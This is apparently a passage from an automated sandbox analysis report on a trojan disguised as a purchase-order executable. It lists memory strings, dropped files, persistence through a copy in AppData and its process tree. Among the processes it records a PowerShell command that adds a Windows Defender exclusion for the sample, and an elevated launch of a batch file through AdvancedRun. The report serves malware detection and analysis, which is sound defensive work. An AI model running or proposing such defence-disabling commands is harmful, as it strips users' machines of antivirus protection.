                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/search/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, SWqTT.exe, 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: 08042021New-PurchaseOrder.exe
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A2CBB0
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A244E0
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A24C58
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A2CBA0
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010DA970
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010D28B8
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010D22D0
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010DA96B
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: invalid certificate
                      Source: AdvancedRun.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 08042021New-PurchaseOrder.exeBinary or memory string: OriginalFilename vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.306148340.0000000007CA8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameHcAj CBJ.exe2 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000000.202307233.0000000000142000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.293666584.00000000044C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.288756404.0000000000CB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302392796.0000000006580000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.298745128.0000000005590000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.288723697.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000011.00000000.276780249.0000000000FA2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exeBinary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\F
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InProcServer32
                      Source: classification engineClassification label: mal96.troj.evad.winEXE@35/25@2/2
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 6_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile created: C:\Users\user\JMfuFTspQyAokpYkLoiLJnktrYABdrUoj
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4952
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: 08042021New-PurchaseOrder.exeReversingLabs: Detection: 14%
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe:Zone.Identifier
                      Source: unknownProcess created: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe'
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe 'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe'
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe 'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe'
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: System.Core.ni.pdbRSDSD source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe, 00000005.00000000.233606021.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000000.377976496.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000025.00000000.411827266.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000026.00000000.421152625.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.34.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\F source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.pdbZ source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: mscorlib.pdb853321935-2125563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32# source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: jVisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: System.Configuration.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb-Q source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: jLC:\Windows\Microsoft.VisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: O.pdb4( source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: mscorlib.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb5t source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302660548.0000000006764000.00000004.00000001.sdmp
                      Source: Binary string: System.Drawing.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Drawing.pdb9 source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: @sxC:\Users\user\Desktop\08042021New-PurchaseOrder.PDBO source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: ww08042021New-PurchaseOrder.PDB source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbu source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.pdb source: WER3A64.tmp.dmp.20.dr
